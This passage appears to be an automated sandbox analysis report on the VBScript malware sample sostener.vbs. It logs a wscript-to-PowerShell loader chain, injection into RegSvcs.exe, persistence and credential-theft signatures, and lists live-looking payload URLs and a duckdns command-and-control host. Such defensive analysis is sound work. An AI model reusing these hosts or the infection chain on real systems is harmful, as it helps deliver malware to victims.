                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: Yara matchFile source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: procexp.exe
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information321
                Scripting
                Valid Accounts1
                Windows Management Instrumentation
                321
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                OS Credential Dumping2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                DLL Side-Loading
                211
                Process Injection
                121
                Obfuscated Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop ProtocolData from Removable Media11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution
                1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                2
                Software Packing
                Security Account Manager121
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                Command and Scripting Interpreter
                21
                Registry Run Keys / Startup Folder
                21
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts1
                Scheduled Task/Job
                Network Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets21
                Virtualization/Sandbox Evasion
                SSHKeylogging23
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable Media3
                PowerShell
                RC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
                Process Injection
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519308 Sample: sostener.vbs Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 107 dcmxz.duckdns.org 2->107 109 www.informacionoportuna.com 2->109 111 2 other IPs or domains 2->111 125 Suricata IDS alerts for network traffic 2->125 127 Found malware configuration 2->127 129 Malicious sample detected (through community Yara rule) 2->129 133 19 other signatures 2->133 13 wscript.exe 1 2->13         started        16 powershell.exe 2->16         started        18 powershell.exe 2->18         started        signatures3 131 Uses dynamic DNS services 107->131 process4 signatures5 155 VBScript performs obfuscated calls to suspicious functions 13->155 157 Suspicious powershell command line found 13->157 159 Wscript starts Powershell (via cmd or directly) 13->159 161 2 other signatures 13->161 20 powershell.exe 7 13->20         started        23 wscript.exe 16->23         started        25 conhost.exe 16->25         started        27 wscript.exe 18->27         started        29 conhost.exe 18->29         started        process6 signatures7 135 Suspicious powershell command line found 20->135 137 Bypasses PowerShell execution policy 20->137 139 Found suspicious powershell code related to unpacking or dynamic code loading 20->139 141 Wscript called in batch mode (surpress errors) 20->141 31 powershell.exe 14 17 20->31         started        36 conhost.exe 20->36         started        143 Wscript starts Powershell (via cmd or directly) 23->143 38 powershell.exe 23->38         started        40 powershell.exe 27->40         started        process8 dnsIp9 113 91.202.233.169, 49706, 49718, 49721 M247GB Russian Federation 31->113 115 informacionoportuna.com 15.235.85.194, 443, 49704, 49705 HP-INTERNET-ASUS United States 31->115 97 C:\Users\user\AppData\Local\Temp\xx2.vbs, ASCII 31->97 dropped 99 C:\Users\user\AppData\Local\Temp\xx1.ps1, ASCII 31->99 dropped 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 31->117 119 Writes to foreign memory regions 31->119 121 Injects a PE file into a foreign processes 31->121 42 powershell.exe 24 31->42         started        45 powershell.exe 13 31->45         started        48 RegSvcs.exe 1 2 31->48         started        51 powershell.exe 31->51         started        123 Wscript called in batch mode (surpress errors) 38->123 53 wscript.exe 38->53         started        55 conhost.exe 38->55         started        57 wscript.exe 40->57         started        59 conhost.exe 40->59         started        file10 signatures11 process12 dnsIp13 149 Loading BitLocker PowerShell Module 42->149 61 powershell.exe 1 11 42->61         started        101 C:\Users\...\sostener.vbs:Zone.Identifier, ASCII 45->101 dropped 103 C:\Users\user\AppData\Local\...\sostener.vbs, Unicode 45->103 dropped 105 dcmxz.duckdns.org 45.135.232.38, 35650, 49710 ASBAXETNRU Russian Federation 48->105 151 Suspicious powershell command line found 53->151 153 Wscript starts Powershell (via cmd or directly) 53->153 64 powershell.exe 53->64         started        66 powershell.exe 57->66         started        file14 signatures15 process16 signatures17 163 Creates autostart registry keys with suspicious values (likely registry only malware) 61->163 165 Creates autostart registry keys with suspicious names 61->165 167 Suspicious powershell command line found 64->167 68 powershell.exe 64->68         started        71 conhost.exe 64->71         started        73 powershell.exe 66->73         started        75 conhost.exe 66->75         started        process18 signatures19 145 Writes to foreign memory regions 68->145 147 Injects a PE file into a foreign processes 68->147 77 powershell.exe 68->77         started        79 powershell.exe 68->79         started        81 powershell.exe 68->81         started        91 2 other processes 68->91 83 powershell.exe 73->83         started        85 powershell.exe 73->85         started        87 powershell.exe 73->87         started        89 RegSvcs.exe 73->89         started        process20 process21 93 powershell.exe 77->93         started        95 powershell.exe 83->95         started       

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                sostener.vbs13%ReversingLabsWin32.Trojan.Honolulu
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://x1.c.lencr.org/00%URL Reputationsafe
                http://x1.i.lencr.org/00%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://oneget.orgX0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://oneget.org0%URL Reputationsafe
                http://91.202.233.16920%Avira URL Cloudsafe
                http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                http://91.202.233.169/Tak/Reg/Marz/Ex0%Avira URL Cloudsafe
                http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                https://www.informacionoportuna.com/wp-content/uploads/2024/100%Avira URL Cloudmalware
                http://crl.microsoft0%Avira URL Cloudsafe
                http://informacionoportuna.com0%Avira URL Cloudsafe
                https://www.informacionoportuna.com0%Avira URL Cloudsafe
                https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt100%Avira URL Cloudmalware
                http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                http://wicroft.com0%Avira URL Cloudsafe
                https://www.informacionoportuna.com/wp-content/uploads/2024/09/dX100%Avira URL Cloudmalware
                http://91.202.233.1690%Avira URL Cloudsafe
                http://www.informacionoportuna.com0%Avira URL Cloudsafe
                HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DS1.TXT100%Avira URL Cloudmalware
                http://r11.i.lencr.org/0=0%Avira URL Cloudsafe
                dcmxz.duckdns.org100%Avira URL Cloudmalware
                https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt100%Avira URL Cloudmalware
                https://github.com/Pester/Pester0%Avira URL Cloudsafe
                https://aka.ms/pscore60%Avira URL Cloudsafe
                http://91.202.HX0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  unknown
                  dcmxz.duckdns.org
                  45.135.232.38
                  truetrue
                    unknown
                    informacionoportuna.com
                    15.235.85.194
                    truetrue
                      unknown
                      www.informacionoportuna.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txttrue
                        • Avira URL Cloud: malware
                        unknown
                        https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txtfalse
                        • Avira URL Cloud: malware
                        unknown
                        dcmxz.duckdns.orgtrue
                        • Avira URL Cloud: malware
                        unknown
                        http://91.202.233.169/Tak/Reg/Marz/ENVS/DS1.txttrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://91.202.233.1692powershell.exe, 00000004.00000002.2090885360.00000155C419D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
